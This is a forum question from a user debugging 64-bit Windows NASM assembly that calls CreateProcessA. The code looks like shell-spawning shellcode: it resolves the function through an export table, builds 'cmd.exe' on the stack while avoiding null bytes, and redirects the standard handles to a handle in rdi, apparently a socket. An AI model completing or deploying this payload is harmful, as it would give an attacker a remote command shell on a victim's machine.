I have problems with CreateProcessA on Win64 ASM

  64-bit, assembly, nasm, windows

I’m trying to use CreateProcessA on Win64 with nasm, but I don’t know whats is wrong… I think it could be the "shadow space" but I tried to add 8 bytes for every "push" and it fails, and I really don’t know what more can I do, searching on internet I don’t find anything about how to use CreateProcessA on Win64. Can somebody help me to fix it. Please.

mov esi, [rdx+0x24]
add rsi, rbx
mov cx, [rsi+rcx*2]
mov esi, [rdx+0x1c]
add rsi, rbx
mov edx, [rsi+rcx*4]
add rdx, rbx 

mov r13, rdx  ;CreateProcessA

xor rdx, rdx
xor r15, r15
mov rdx, 0x616578652e646d63
push rdx
sub word[rsp+0x7], 0x61
mov r15, rsp    ;cmd.exe

xor rdx, rdx
push rdi  ;hStdError
push rdi  ;hStdOutput
push rdi  ;hStdInput 
push rdx
push rdx
xor rax, rax
inc rax
rol rax, 8
push rax
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
xor rax, rax
add al, 44
push rax
xor r14, r14
mov r14, rsp   ;STARTUPINFOA

xor rdi, rdi
xor r12, r12
sub rsp, 0x16
mov r12, rsp   ;ProcessInfo

sub rsp, 0x20 ;shadowspace

xor r8, r8
xor r9, r9
mov [rsp+72], r12
mov [rsp+64], r14
mov [rsp+56], rdx
mov [rsp+48], rdx
mov [rsp+40], rdx
xor rax, rax
inc rax
mov [rsp+32], rax
mov r9, rdi
mov r8, rdi
xor rdx, rdx
mov rdx, r15
xor rcx, rcx

call r13

Source: Windows Questions

LEAVE A COMMENT